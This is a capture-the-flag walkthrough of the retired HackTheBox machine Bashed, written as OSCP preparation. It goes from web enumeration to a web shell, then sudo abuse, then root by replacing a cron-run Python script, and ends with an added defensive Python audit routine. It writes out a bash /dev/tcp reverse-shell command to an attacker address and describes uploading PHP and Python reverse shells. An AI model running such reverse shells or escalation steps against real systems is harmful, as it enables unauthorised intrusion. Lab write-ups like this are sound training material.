OSCP PREPARATIONS – HTB Bashed

Bashed is a retired, vulnerable Linux machine. We are expected to use its vulnerabilities to obtain the user and root flags.
We perform a network scan to identify the target machine:


Classic Scan

Full port scan

As a result of the port scan, we saw that only port 80/tcp is open and that an HTTP service is running on it.
Because of the HTTP service, we continue enumerating the target through the browser.

We enumerated the website and did not find any useful information, so we ran directory scans with gobuster and dirbuster.

As a result of the directory scan, we detected the /css, /dev, /fonts, /images, /index.html, /js, /php, /server-status and /uploads paths.
We looked through all of them, and the /dev directory was the most interesting.

The pages there gave us a shell as we know it.
We were able to run the commands we wanted.

Since we can run the commands we want, let’s run a bash reverse shell:
bash -i >& /dev/tcp/10.10.14.13/1234 0>&1
Before running the command, we start an ncat listener in the background to catch the shell.

We didn’t get a shell ☹
Let’s try uploading a shell to the uploads directory instead.

We went into the uploads folder and created a file named muhammed.

As we can see, if we enter the name of a file that is not here, it gives us an error. Let’s try to upload pentestmonkey’s PHP reverse shell here.

We uploaded our shell to the machine.
Now let’s run our shell.

Ta ta ta ta, we got our shell.

Since our shell is unprivileged, let’s check what we can run with sudo -l.

When we ran sudo -l, we saw that we can run all commands as the scriptmanager user.

By typing the command “sudo -u scriptmanager bash” we switched to that user, and then we found and noted our user flag.

When we try to access the root flag, we get a permission error.

We tried to escalate privileges using the sudo -l command, but it asked us for a password, and since we did not have the password we could not use it.
We perform local enumeration.

The scripts directory attracts our attention. Inside it, the test.py and test.txt files stood out.

Here test.py writes to test.txt when it runs.

Here we delete the test.py file and create a test.py that will give us a reverse shell.

On our machine we create a Python file called test.py that will open a reverse shell.
We take the Python reverse shell from pentestmonkey, edit it and save it.

Now we start a web server in Python to serve the file, and download the file on the target.

Our attacker machine

target machine

We placed our reverse shell on the target machine and waited 1 minute.
Then we received the reverse shell on the listener we had opened in the background.

And we were able to get the root flag.
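
A defender's view of the misconfiguration behind this last step, as an added example that is not part of the original write-up: it assumes (as the one-minute wait suggests) that a root-run scheduled job executes the .py files in the scripts directory, and checks whether any account other than the job's user can modify what that job runs. The `audit_script_dir` function, the temporary directory and its contents are constructed for illustration.

```python
import os
import stat
import tempfile


def audit_script_dir(path, trusted_uids=(0,)):
    """Report (path, reason) pairs for anything in a job's script directory
    that an account outside trusted_uids could replace or modify."""
    findings = []
    d = os.stat(path)
    if d.st_uid not in trusted_uids:
        findings.append((path, f"directory owned by uid {d.st_uid}"))
    if d.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append((path, "directory is group/world-writable"))
    for name in sorted(os.listdir(path)):
        full = os.path.join(path, name)
        st = os.lstat(full)  # lstat: do not follow symlinks
        if stat.S_ISLNK(st.st_mode):
            findings.append((full, "symlink inside job directory"))
        elif stat.S_ISREG(st.st_mode) and name.endswith(".py"):
            if st.st_uid not in trusted_uids:
                findings.append((full, f"script owned by uid {st.st_uid}"))
            if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((full, "script is group/world-writable"))
    return findings


def demo():
    """Audit a constructed directory under three ownership/permission setups."""
    me = os.getuid()
    with tempfile.TemporaryDirectory() as tmp:
        script = os.path.join(tmp, "test.py")
        with open(script, "w") as fh:
            fh.write("open('test.txt', 'w').write('ran')\n")
        os.chmod(tmp, 0o755)
        os.chmod(script, 0o644)
        # 1) job user owns directory and script, no extra write bits
        clean = audit_script_dir(tmp, trusted_uids=(me,))
        # 2) job runs as a different uid than the owner (the layout above)
        weak = audit_script_dir(tmp, trusted_uids=(me + 1,))
        # 3) correct owner, but the script is writable by everyone
        os.chmod(script, 0o666)
        loose = audit_script_dir(tmp, trusted_uids=(me,))
    return clean, weak, loose


if __name__ == "__main__":
    for label, result in zip(("clean", "weak", "loose"), demo()):
        print(label, [reason for _, reason in result])
```

On a real host, call `audit_script_dir` with the default `trusted_uids=(0,)` on every directory a root job executes from; any finding means a lower-privileged account can decide what root runs.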
